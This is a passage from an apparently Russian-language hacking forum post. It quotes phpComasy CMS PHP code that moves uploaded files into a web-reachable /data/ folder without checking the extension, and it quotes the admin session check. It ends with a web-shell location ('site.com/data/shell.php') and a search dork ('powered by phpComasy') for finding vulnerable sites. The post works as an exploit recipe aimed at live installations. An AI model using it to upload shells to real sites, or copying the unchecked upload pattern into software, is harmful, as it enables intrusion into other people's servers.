[/COLOR][COLOR="#0000BB"]$new_filename_without_path[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]" "[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"_"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]web[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]tools[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]special_chars_to_html[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'file'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"]));
[/COLOR][COLOR="#0000BB"]move_uploaded_file[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'file'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'tmp_name'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]__ABSOLUTE_PATH[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'/data/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$new_filename[/COLOR][COLOR="#007700"]);
if (([/COLOR][COLOR="#0000BB"]$extention[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]".png"[/COLOR][COLOR="#007700"]) || ([/COLOR][COLOR="#0000BB"]$extention[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]".gif"[/COLOR][COLOR="#007700"]) || ([/COLOR][COLOR="#0000BB"]$extention[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]".jpg"[/COLOR][COLOR="#007700"]) || ([/COLOR][COLOR="#0000BB"]$extention[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]".jpeg"[/COLOR][COLOR="#007700"])) {
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]web[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]message[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]send_message[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]_MESSAGE_FILE_UPLOAD_SUCCESSFUL[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'&action=image_convert_form&path='[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]path[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'&file='[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$new_filename_without_path[/COLOR][COLOR="#007700"]);
}
else {
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]web[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]message[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]send_message[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]_MESSAGE_FILE_UPLOAD_SUCCESSFUL[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'&action=file_manager&path='[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]path[/COLOR][COLOR="#007700"]);
}
}
else {
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]web[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]message[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]send_message[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]_MESSAGE_REQUIRED_PARAMETER[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'&action=file_upload_form&path='[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]path[/COLOR][COLOR="#007700"]);
}
}
else {[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]web[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]message[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]send_message[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]_MESSAGE_NO_PERMISSION[/COLOR][COLOR="#007700"]);}
}
[/COLOR][/COLOR]
classes/class.security.php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]check_security[/COLOR][COLOR="#007700"]() {
if ((!empty([/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'user_id'[/COLOR][COLOR="#007700"]]) ) && (!empty([/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'user_username'[/COLOR][COLOR="#007700"]])) && (@[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'user_role'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#DD0000"]'admin'[/COLOR][COLOR="#007700"])) {
[/COLOR][COLOR="#FF8000"]// additional check (phpcomasy url)
[/COLOR][COLOR="#007700"]if ([/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'user_url'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#0000BB"]__WEB_PATH[/COLOR][COLOR="#007700"]) {
return[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"];
}
else {
return[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];
}
}
else {
return[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];
}
}
[/COLOR][/COLOR]
Shell: http://site.com/data/shell.php
Dork: powered by phpComasy
|
|
|
|
 |
|
Предыдущая тема
Следующая тема
Похожие темы
|
| Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
|
Библиотека
|
SladerNon |
Болталка |
17 |
05.02.2007 23:30 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|